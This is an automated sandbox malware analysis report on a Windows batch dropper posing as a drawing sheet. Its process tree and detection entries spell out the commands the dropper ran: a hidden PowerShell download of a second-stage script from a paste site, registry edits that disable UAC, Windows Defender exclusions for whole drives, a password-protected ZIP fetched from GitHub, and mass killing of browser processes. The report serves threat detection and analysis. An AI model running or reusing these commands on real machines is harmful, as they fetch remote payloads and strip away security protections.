Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NEW-DRAWING-SHEET.bat

Overview

General Information

Sample name:NEW-DRAWING-SHEET.bat
Analysis ID:1582348
MD5:6b9cf24f2b691606642bd18bf2227a62
SHA1:046ab52fa2f7fd4a6487d3ddcd58dd7f08f157bc
SHA256:f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1
Tags:batknkbkk212user-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Disables UAC (registry)
Drops password protected ZIP file
Excessive usage of taskkill to terminate processes
Loading BitLocker PowerShell Module
Sigma detected: PowerShell DownloadFile
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powerup Write Hijack DLL
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses cmd line tools excessively to alter registry or file data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: File Download From Browser Process Via Inline URL
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7332 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7384 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7440 cmdline: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • powershell.exe (PID: 7656 cmdline: powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat'))" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7744 cmdline: "C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat / MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 7788 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • reg.exe (PID: 7820 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • reg.exe (PID: 7864 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • reg.exe (PID: 7992 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • reg.exe (PID: 8044 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • reg.exe (PID: 8084 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • reg.exe (PID: 8184 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • reg.exe (PID: 3760 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • reg.exe (PID: 5332 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • reg.exe (PID: 4108 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • reg.exe (PID: 7880 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • reg.exe (PID: 1396 cmdline: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • powershell.exe (PID: 8188 cmdline: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 8472 cmdline: PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 8760 cmdline: PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 8872 cmdline: PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 8992 cmdline: PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 9100 cmdline: PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • chrome.exe (PID: 7884 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zip MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 7408 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1980,i,6972678540709667438,18385464693239191531,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • timeout.exe (PID: 7984 cmdline: timeout /t 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • 7z.exe (PID: 8672 cmdline: "C:\Program Files\7-Zip\7z.exe" x "C:\Users\user\Downloads\DOC.zip" -o"C:\Users\user\Downloads" -pFuckSyrialAndFreePsAndFreeSyria00963 MD5: 9A1DD1D96481D61934DCC2D568971D06)
      • timeout.exe (PID: 8744 cmdline: timeout /t 9 MD5: 100065E21CFBBDE57CBA2838921F84D6)
      • taskkill.exe (PID: 4108 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 2640 cmdline: taskkill /F /IM firefox.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 7860 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 5900 cmdline: taskkill /F /IM iexplore.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 5552 cmdline: taskkill /F /IM opera.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 7596 cmdline: taskkill /F /IM safari.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 5804 cmdline: taskkill /F /IM brave.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 8224 cmdline: taskkill /F /IM vivaldi.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 8288 cmdline: taskkill /F /IM epic.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 7956 cmdline: taskkill /F /IM yandex.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 3336 cmdline: taskkill /F /IM tor.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • taskkill.exe (PID: 5652 cmdline: taskkill /F /IM CMD.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
  • svchost.exe (PID: 8152 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
NEW-DRAWING-SHEET.batJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 7440JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_7440.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        amsi64_7656.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: PowerShell DownloadFile
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7384, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", ProcessId: 7440, ProcessName: powershell.exe
          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat / , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7744, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 8188, ProcessName: powershell.exe
          Sigma detected: Powerup Write Hijack DLL
          Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7440, TargetFilename: C:\Users\user\AppData\Local\Temp\BatchByloadStartHid.bat
          Sigma detected: Change PowerShell Policies to an Insecure Level
          Source: Process startedAuthor: frack113: Data: Command: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7384, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", ProcessId: 7440, ProcessName: powershell.exe
          Sigma detected: File Download From Browser Process Via Inline URL
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zip, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zip, CommandLine|base64offset|contains: -j~b,, Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7384, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zip, ProcessId: 7884, ProcessName: chrome.exe
          Sigma detected: Potential Binary Or Script Dropper Via PowerShell
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7440, TargetFilename: C:\Users\user\AppData\Local\Temp\BatchByloadStartHid.bat
          Sigma detected: PowerShell Download Pattern
          Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7384, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", ProcessId: 7440, ProcessName: powershell.exe
          Sigma detected: PowerShell Web Download
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7384, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", ProcessId: 7440, ProcessName: powershell.exe
          Sigma detected: Powershell Defender Exclusion
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat / , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7744, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 8188, ProcessName: powershell.exe
          Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
          Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7384, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", ProcessId: 7440, ProcessName: powershell.exe
          Sigma detected: Usage Of Web Request Commands And Cmdlets
          Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7384, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", ProcessId: 7440, ProcessName: powershell.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\NEW-DRAWING-SHEET.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7384, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", ProcessId: 7440, ProcessName: powershell.exe
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8152, ProcessName: svchost.exe

          Suricata Signatures

          No Suricata rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: NEW-DRAWING-SHEET.batVirustotal: Detection: 34%Perma Link
          Source: NEW-DRAWING-SHEET.batReversingLabs: Detection: 23%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
          Source: unknownHTTPS traffic detected: 172.67.144.225:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: global trafficHTTP traffic detected: GET /raw/a1af5a4d0301 HTTP/1.1Host: paste.foConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
          Source: Joe Sandbox ViewIP Address: 185.199.111.133 185.199.111.133
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 2.22.50.144
          Source: unknownTCP traffic detected without corresponding DNS query: 2.22.50.144
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /raw/a1af5a4d0301 HTTP/1.1Host: paste.foConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /knkbkk212/knkbkk212/refs/heads/main/DOC.zip HTTP/1.1Host: raw.githubusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficDNS traffic detected: DNS query: paste.fo
          Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: svchost.exe, 00000011.00000002.2922057231.000001EB8E600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
          Source: svchost.exe, 00000011.00000003.1822496548.000001EB8E378000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
          Source: edb.log.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
          Source: qmgr.db.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
          Source: qmgr.db.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
          Source: svchost.exe, 00000011.00000003.1822496548.000001EB8E378000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
          Source: svchost.exe, 00000011.00000003.1822496548.000001EB8E378000.00000004.00000800.00020000.00000000.sdmp, edb.log.17.dr, qmgr.db.17.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
